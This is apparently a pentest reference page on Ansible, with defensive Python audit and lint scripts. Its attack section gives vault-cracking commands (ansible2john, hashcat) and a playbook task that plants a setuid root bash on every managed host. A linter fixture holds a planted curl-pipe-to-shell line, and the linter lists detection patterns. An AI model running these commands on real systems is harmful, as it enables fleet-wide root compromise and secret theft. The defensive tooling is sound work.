Ansible
aka awx, semaphore
Config-management/automation. Ansible Vault-encrypted strings crack offline (ansible2john), and because playbooks run against managed hosts (often as root), write access to a playbook is code execution on the fleet.
Ports
| Port | Proto | Notes |
|---|---|---|
| 80 | tcp | AWX / Semaphore web UI |
Fingerprint
- `$ANSIBLE_VAULT;1.1;AES256` headers in `vars/` and `group_vars/` files
- playbooks (`*.yml`), `inventory`/`hosts` files, `ansible.cfg` on disk
Key files
| Path | Holds | Sensitive |
|---|---|---|
| group_vars/all.yml | Vault-encrypted secrets, plaintext vars | sensitive |
| ansible.cfg | vault_password_file path, remote_user, become settings | sensitive |
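Fingerprinting the same files from the defender's side means knowing which variables are actually under Vault and which secret-looking keys were committed in the clear. The script below is an added example, not code from Ansible or from this page: it parses the `$ANSIBLE_VAULT` header (version 1.1, or 1.2 with a vault-id label) and classifies the top-level keys of a constructed `group_vars/all.yml` sample as encrypted, plaintext secret, or ordinary. The key-name regex and the sample content are assumptions chosen for the demonstration.

```python
import re

# Constructed sample of a group_vars/all.yml (not from any real project): one
# value encrypted inline with !vault, two secret-looking values left in plaintext.
SAMPLE_GROUP_VARS = """\
---
db_host: db.internal.example
db_password: !vault |
  $ANSIBLE_VAULT;1.1;AES256
  66386439653236336462626566653063336164663966303231363934653561363964363833313662
api_token: plaintext-token-example
ssh_private_key: "-----BEGIN OPENSSH PRIVATE KEY----- (constructed)"
ntp_server: time.example
"""

# Header written by ansible-vault: format version (1.1 or 1.2), cipher, and in
# 1.2 an optional vault id label naming which password file can open it.
VAULT_HEADER_RE = re.compile(
    r"^\$ANSIBLE_VAULT;(?P<version>1\.[12]);(?P<cipher>AES256)(?:;(?P<vault_id>[\w.-]+))?$"
)
# Key names that should never hold a plaintext value in version control (assumed list).
SECRET_KEY_RE = re.compile(r"pass(?:word|wd)?|secret|token|api_?key|private_?key|credential", re.I)
# Top-level "key: value" lines; indented continuation lines are skipped.
TOP_LEVEL_KEY_RE = re.compile(r"^(?P<key>[A-Za-z_]\w*):\s*(?P<value>.*)$")


def parse_vault_header(line):
    """Return (version, vault_id) for a $ANSIBLE_VAULT header line, or None."""
    m = VAULT_HEADER_RE.match(line.strip())
    if not m:
        return None
    return m.group("version"), m.group("vault_id")


def audit_vars_text(text):
    """Classify each top-level variable as encrypted, plaintext secret, or non-secret.

    A file whose first content line is a vault header is encrypted as a whole and
    is reported as such without looking at individual keys.
    """
    report = {"whole_file_vault": False, "encrypted": [], "plaintext_secrets": [], "non_secret": []}
    content = [ln for ln in text.splitlines() if ln.strip() and ln.strip() != "---"]
    if content and parse_vault_header(content[0]):
        report["whole_file_vault"] = True
        return report
    for line in content:
        m = TOP_LEVEL_KEY_RE.match(line)
        if not m:
            continue  # block-scalar body, comment, or nested key
        key, value = m.group("key"), m.group("value").strip()
        if value.startswith("!vault"):
            report["encrypted"].append(key)
        elif SECRET_KEY_RE.search(key):
            report["plaintext_secrets"].append(key)
        else:
            report["non_secret"].append(key)
    return report


if __name__ == "__main__":
    for bucket, keys in audit_vars_text(SAMPLE_GROUP_VARS).items():
        print(f"{bucket}: {keys}")
```

Run it over every file under `group_vars/` and `host_vars/`; any key landing in `plaintext_secrets` is a credential that an offline crack of the vault was never needed for.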
Exploitation primitives
- Crack Ansible Vault: `ansible2john` → hashcat mode 16900, then `ansible-vault decrypt`
- Writable playbook/role → add a task that runs your payload on the next run (often as root via `become`)
- AWX/Semaphore web: stored machine credentials + job templates → run arbitrary commands on managed hosts
Overview
Ansible pushes playbooks to managed hosts, usually escalating with `become: true`. Two wins: decrypting Vault secrets, and abusing the playbook run itself to execute on targets.
Crack an Ansible Vault
```shell
ansible2john vault.yml > vault.hash
hashcat -m 16900 vault.hash /usr/share/wordlists/rockyou.txt
```
Decrypt with the recovered password:
```shell
ansible-vault decrypt group_vars/all.yml
```
Abuse a writable playbook
Append a task that runs as the escalated user:
```yaml
- hosts: all
  become: true
  tasks:
    - shell: cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash
```
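Because a playbook commit is effectively a fleet-wide command, the defensive control is a gate that reviews free-form `shell`/`command`/`raw`/`script` tasks before a job runs. The linter below is an added example, not part of this page or of Ansible: it walks a constructed playbook that contains the planted task above next to ordinary tasks, flags commands matching a small set of assumed suspicious patterns (setuid bit, shell binary copied elsewhere, remote script piped to a shell, base64-decoded payloads, sudoers/authorized_keys edits), and marks anonymous privileged commands for review. Its line-based parsing handles plain and block-scalar commands but is not a full YAML parser.

```python
import re

# Constructed playbook (not from any real project): two ordinary tasks plus two
# planted ones of the kind a writable playbook invites.
SAMPLE_PLAYBOOK = """\
- hosts: webservers
  become: true
  tasks:
    - name: Deploy nginx config
      template:
        src: nginx.conf.j2
        dest: /etc/nginx/nginx.conf
    - name: Reload nginx
      service:
        name: nginx
        state: reloaded
    - shell: cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash
    - name: Pull helper
      shell: |
        curl -s http://updates.example/setup.sh | sh
"""

# Modules that hand a free-form command to the managed host (short or FQCN name).
CMD_MODULE_RE = re.compile(
    r"^(?P<indent>\s*)(?P<dash>-\s+)?(?:ansible\.builtin\.)?(?P<module>shell|command|raw|script):\s*(?P<cmd>.*)$"
)
PLAY_RE = re.compile(r"^\s*-\s+hosts:")
BECOME_RE = re.compile(r"^\s*become:\s*(?:true|yes)\s*$", re.I)

# Assumed command patterns worth stopping a job for; each label explains the match.
SUSPICIOUS = [
    ("setuid bit set", re.compile(r"chmod\s+(?:-\S+\s+)*(?:[ugoa]*\+s|[0-7]?[4-7][0-7]{3})\b")),
    ("shell binary copied out of place", re.compile(r"\bcp\s+\S*/bin/(?:ba)?sh\b")),
    ("remote script piped to a shell", re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")),
    ("base64-decoded payload", re.compile(r"base64\s+(?:-d|--decode)\b")),
    ("sudoers or authorized_keys touched", re.compile(r"/etc/sudoers|authorized_keys")),
]


def _indent(line):
    return len(line) - len(line.lstrip())


def lint_playbook(text):
    """Return one finding per shell/command/raw/script task, each with a severity."""
    lines = text.splitlines()
    findings = []
    become = False  # approximation: a become: line applies to everything after it in the play
    i = 0
    while i < len(lines):
        line = lines[i]
        if PLAY_RE.match(line):
            become = False
        elif BECOME_RE.match(line):
            become = True
        m = CMD_MODULE_RE.match(line)
        if m:
            task_line = i + 1
            cmd = m.group("cmd").strip()
            if cmd.startswith(("|", ">")):  # block scalar: gather the indented body
                body = []
                while i + 1 < len(lines) and (
                    not lines[i + 1].strip() or _indent(lines[i + 1]) > len(m.group("indent"))
                ):
                    i += 1
                    body.append(lines[i].strip())
                cmd = " ".join(b for b in body if b)
            reasons = [label for label, rx in SUSPICIOUS if rx.search(cmd)]
            named = m.group("dash") is None  # "- shell:" opens a task that carries no name:
            if reasons:
                severity = "high"
            elif become and not named:
                severity = "medium"  # anonymous privileged command: review before running
            else:
                severity = "info"
            findings.append({"line": task_line, "module": m.group("module"), "command": cmd,
                             "become": become, "named": named, "severity": severity, "reasons": reasons})
        i += 1
    return findings


if __name__ == "__main__":
    for f in lint_playbook(SAMPLE_PLAYBOOK):
        print(f"line {f['line']:>3} {f['severity']:<6} {f['module']}: {f['command']}  {f['reasons']}")
```

Wire this into the CI step that fronts the AWX/Semaphore job template, failing the run on any `high` finding, so a pushed task reaches managed hosts only after a human has looked at it.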
Hardening
Store the vault password out of the repo, lock down write access to playbooks/roles, and least-privilege the become user.
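Each of those three hardening points is checkable on disk. The audit below is an added example, not Ansible's own tooling: it reads `ansible.cfg`, resolves `vault_password_file` and reports it if it sits inside the repository or is readable by group/other, flags any playbook, role or config file that group/other can modify, and notes a global `become` that targets root. It builds its own throwaway repository with constructed sample files so it runs offline; the file names, modes and config values in that fixture are assumptions for the demonstration.

```python
import configparser
import os
import stat
import tempfile


def parse_ansible_cfg(path):
    """Read ansible.cfg (INI format) with interpolation off so '%' in values is safe."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read(path)
    return cfg


def audit_repo(repo):
    """Return (severity, path, message) findings for the three hardening points above."""
    repo = os.path.realpath(repo)
    findings = []
    cfg_path = os.path.join(repo, "ansible.cfg")
    if os.path.isfile(cfg_path):
        cfg = parse_ansible_cfg(cfg_path)
        # 1. Vault password: must not be committed next to the vault it opens,
        #    and must be readable only by the account that runs Ansible.
        vpf = cfg.get("defaults", "vault_password_file", fallback=None)
        if vpf:
            vpf_path = os.path.realpath(os.path.join(repo, os.path.expanduser(vpf)))
            if vpf_path.startswith(repo + os.sep):
                findings.append(("high", vpf_path, "vault password file is inside the repository"))
            if os.path.isfile(vpf_path):
                mode = stat.S_IMODE(os.stat(vpf_path).st_mode)
                if mode & 0o077:
                    findings.append(("high", vpf_path,
                                     f"vault password file mode {mode:04o} is readable by group/other"))
            else:
                findings.append(("info", vpf_path, "configured vault password file is not present on this host"))
        # 3. Least-privilege become: global escalation straight to root deserves a question.
        if cfg.has_section("privilege_escalation"):
            pe = cfg["privilege_escalation"]
            if pe.get("become", "false").lower() in ("true", "yes", "1") and pe.get("become_user", "root") == "root":
                findings.append(("medium", cfg_path, "become is enabled globally and targets root"))
    # 2. Anything Ansible will execute must not be writable by group or other.
    for dirpath, _, filenames in os.walk(repo):
        for fn in filenames:
            if fn.endswith((".yml", ".yaml", ".cfg")):
                path = os.path.join(dirpath, fn)
                mode = stat.S_IMODE(os.stat(path).st_mode)
                if mode & 0o022:
                    findings.append(("high", path, f"mode {mode:04o} lets group/other modify what Ansible will run"))
    return findings


def build_fixture():
    """Create a throwaway repo of constructed sample files exhibiting each weakness."""
    repo = tempfile.mkdtemp(prefix="ansible-audit-")

    def write(rel, content, mode):
        path = os.path.join(repo, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
        os.chmod(path, mode)

    write("ansible.cfg",
          "[defaults]\nremote_user = deploy\nvault_password_file = .vault_pass\n\n"
          "[privilege_escalation]\nbecome = True\nbecome_user = root\n", 0o644)
    write(".vault_pass", "constructed-sample-password\n", 0o644)   # committed and world-readable
    write("site.yml", "- hosts: all\n  roles: [common]\n", 0o664)  # group-writable playbook
    write("roles/common/tasks/main.yml", "- debug: msg=ok\n", 0o644)
    return repo


if __name__ == "__main__":
    for severity, path, message in audit_repo(build_fixture()):
        print(f"[{severity}] {path}: {message}")
```

Point `audit_repo` at a real checkout instead of the fixture to get the same report; the fix for the first two findings is a password file outside the tree at mode 0600, and for the third a dedicated `become_user` with only the sudo rules the roles need.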